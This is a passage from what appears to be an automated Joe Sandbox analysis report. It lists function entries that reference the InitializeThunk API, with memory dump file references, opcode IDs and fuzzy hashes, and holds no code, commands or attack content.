                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E04F362002147BC220AB69CC40FA7775DDBC5750F404015FA0CA7141C670790587F5
                                                                                                                                                                                                          Function 03454340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: ede3aa078b315a7b7c9ab5b98ceb937a6aa229e321f173bf510cae790b1d2604
                                                                                                                                                                                                          • Instruction ID: 621ece5ddba22035aa89ccfd002fe94d81336f96d8c2a29c9792f48d983603cd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ede3aa078b315a7b7c9ab5b98ceb937a6aa229e321f173bf510cae790b1d2604
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 269002B1605804129140B5584C845464105D7F0301B55C012E4424954C8B148A565366
                                                                                                                                                                                                          Function 03454650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 3d42400d79decbe9c6161bcf31f93f4b4276a2f563bab6d992700d26eebaba05
                                                                                                                                                                                                          • Instruction ID: 46bed6aecc9658dd1fc933f20749e297d6afda24e172190a0be6b5ecab2e58db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d42400d79decbe9c6161bcf31f93f4b4276a2f563bab6d992700d26eebaba05
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD9002E1601504424140B5584C044066105D7F1301395C116A4554960C87188955926E
                                                                                                                                                                                                          Function 03452B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 170126d24b52eec20d269885198ef9aef862ca6314154e29bd8a58c4fdb06a01
                                                                                                                                                                                                          • Instruction ID: 46712948843280342874ff80097948c405022c551aad572fbae36f6561337730
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 170126d24b52eec20d269885198ef9aef862ca6314154e29bd8a58c4fdb06a01
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA9002E1202404034105B5584814616410AC7F0201B55C022E5014990DC7258991612A
                                                                                                                                                                                                          Function 03452BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: af86ab36c3331a8723d1ee745ca637f0df0d8da9704c04727251c0cfe2799dee
                                                                                                                                                                                                          • Instruction ID: 16ef1494a57a2d4f0f3933a114deccc83050b9018af9e86aab2e3cd466d8033d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af86ab36c3331a8723d1ee745ca637f0df0d8da9704c04727251c0cfe2799dee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B19002B120544C42D140B5584804A460115C7E0305F55C012A4064A94D97258E55B666
                                                                                                                                                                                                          Function 03452BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 22f830acc1d383151ef8d2aad24d7492fbebca2a858befbca09988d4aee3d315
                                                                                                                                                                                                          • Instruction ID: a84107f2720bfa11370163cdb73e0b567a3f7179c92d1c7a671f123b6eade0f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22f830acc1d383151ef8d2aad24d7492fbebca2a858befbca09988d4aee3d315
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 429002B120140C02D180B558480464A0105C7E1301F95C016A4025A54DCB158B5977A6
                                                                                                                                                                                                          Function 03452BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 1f1662b5232af03d29f70979fa7054a7be23df42359ea8d0bd25aaa6183e8a19
                                                                                                                                                                                                          • Instruction ID: 189872e3be79a33743fc6fa8bdc12b5edfb5aceee521d9dd8591bfa3d48ca435
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f1662b5232af03d29f70979fa7054a7be23df42359ea8d0bd25aaa6183e8a19
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E89002B160540C02D150B55848147460105C7E0301F55C012A4024A54D87558B5576A6
                                                                                                                                                                                                          Function 03452AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: a882f3d305c246574ff2f4f1856ece4c778dec1e0b9f5bf96cb7748415fccf93
                                                                                                                                                                                                          • Instruction ID: c9bf3776e18cfb4dcd7b58ca55799347d2b3f0da854ec361b36ad6048d3402d8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a882f3d305c246574ff2f4f1856ece4c778dec1e0b9f5bf96cb7748415fccf93
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B9002A5211404030105F9580B045070146C7E5351355C022F5015950CD72189615126
                                                                                                                                                                                                          Function 03452AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 91713c2b335efadbf4d1559d54928889d9aabcc198105597caee9fd69b47c0a8
                                                                                                                                                                                                          • Instruction ID: b97d6502d32233638212e6e4a986bb895abea53177d7674290ed11718e84f8c0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91713c2b335efadbf4d1559d54928889d9aabcc198105597caee9fd69b47c0a8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A39002A5221404020145F9580A0450B0545D7E6351395C016F5416990CC72189655326
                                                                                                                                                                                                          Function 03452F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 974b12afb96b2c7de9c6c0a9b089edd375276b66e4eca786d9ad2c83149864cb
                                                                                                                                                                                                          • Instruction ID: 47da9ad18cc2b5c7478e9d53228f71773741dcce557c904810fb97bdb789671d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 974b12afb96b2c7de9c6c0a9b089edd375276b66e4eca786d9ad2c83149864cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E9002E134140842D100B5584814B060105C7F1301F55C016E5064954D8719CD52612B
                                                                                                                                                                                                          Function 03452FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: cfdb9f4c2d0cf200d716e48d1b7408865dc90eb62547019f1f2126618cdb398d
                                                                                                                                                                                                          • Instruction ID: 1cbffc16bce122eace40e679b393cf3509c7d1ca5cdc7cfca91b37140c80c0fc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfdb9f4c2d0cf200d716e48d1b7408865dc90eb62547019f1f2126618cdb398d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 709002A1211C0442D200B9684C14B070105C7E0303F55C116A4154954CCB1589615526
                                                                                                                                                                                                          Function 03452FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: e9c09a4177a8a3fb61823b8be698cba7f68428bcc3b2215b8b95beec770f1c2c
                                                                                                                                                                                                          • Instruction ID: 6619c6e84e85466cc2f0488e8d2e419cad61184a74dc6523c47b371797490caf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9c09a4177a8a3fb61823b8be698cba7f68428bcc3b2215b8b95beec770f1c2c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B9002A1601404424140B5688C449064105EBF1211755C122A4998950D87598965566A
                                                                                                                                                                                                          Function 03452EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 0a768aaeb051bb6f2461a6d49b47f3119f69219af3749e709f4a0f81c5dce014
                                                                                                                                                                                                          • Instruction ID: f7f7ea576827c34bde473bf2566257f7ef81bfd51c927274188caaa3df7a0e71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a768aaeb051bb6f2461a6d49b47f3119f69219af3749e709f4a0f81c5dce014
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B9002E120180803D140B9584C046070105C7E0302F55C012A6064955E8B298D51613A
                                                                                                                                                                                                          Function 03452E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 57362628e87f52314a6192039ca85e4ba1cc74a61b194339a3794704fe39f39f
                                                                                                                                                                                                          • Instruction ID: ebfa3aa63c48a11e62acfc0797e1f9dfdd78883209b5fb823f3feb11bc8a21e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57362628e87f52314a6192039ca85e4ba1cc74a61b194339a3794704fe39f39f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 809002A160140902D101B5584804616010AC7E0241F95C023A5024955ECB258A92A136
                                                                                                                                                                                                          Function 03452D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: ce7bbc7f120afe23fb94258d9f148e66b69b8db9c472e48cd8487929417ff827
                                                                                                                                                                                                          • Instruction ID: 38bade423e03d2a5b1e88e330a5db26b544ad329224ec5c7c920e549e6f7ed69
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce7bbc7f120afe23fb94258d9f148e66b69b8db9c472e48cd8487929417ff827
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 579002A921340402D180B558580860A0105C7E1202F95D416A4015958CCB1589695326
                                                                                                                                                                                                          Function 03452D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: b80e70a80c9417c33a32642b9081a14865d65532dea7555fa520954e7db161ec
                                                                                                                                                                                                          • Instruction ID: 3c71192f3d7f65df9ab2c9ffab6deb247572c1dd050576bdaac85258dda5220a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80e70a80c9417c33a32642b9081a14865d65532dea7555fa520954e7db161ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A9002A130140403D140B55858186064105D7F1301F55D012E4414954CDB1589565227
                                                                                                                                                                                                          Function 03452DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 74a9315a550c43fae189389d8bc937ec6cd6e0a3632efa300087600f9a1ed3f0
                                                                                                                                                                                                          • Instruction ID: 10cb8f01d500c90f9321ecbd67526b37431b982dd96e5bc1a3a8b560315134f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74a9315a550c43fae189389d8bc937ec6cd6e0a3632efa300087600f9a1ed3f0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC9002A1242445525545F55848045074106D7F0241795C013A5414D50C87269956D626
                                                                                                                                                                                                          Function 03452DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 2c73e74f33ba1b239491a2c1c37df3a76ed257311605218eabe820044a81965c
                                                                                                                                                                                                          • Instruction ID: bdf2a12f2a35976a9c9267736d9fc84b8bb72a49fee8816a60d675e1e6288a61
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c73e74f33ba1b239491a2c1c37df3a76ed257311605218eabe820044a81965c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 659002B120140813D111B55849047070109C7E0241F95C413A4424958D97568A52A126
                                                                                                                                                                                                          Function 03452C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 8d37d161c851ada1b27ca1a1d895fc7b14097f2b5db79071d85f8e03f606e259
                                                                                                                                                                                                          • Instruction ID: 335f71764cf3f7c64ccd1b061b2b04853d0dad28f1ca80ffb1bdc87911823d91
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d37d161c851ada1b27ca1a1d895fc7b14097f2b5db79071d85f8e03f606e259
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A9002B120140C42D100B5584804B460105C7F0301F55C017A4124A54D8715C9517526
                                                                                                                                                                                                          Function 03452C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
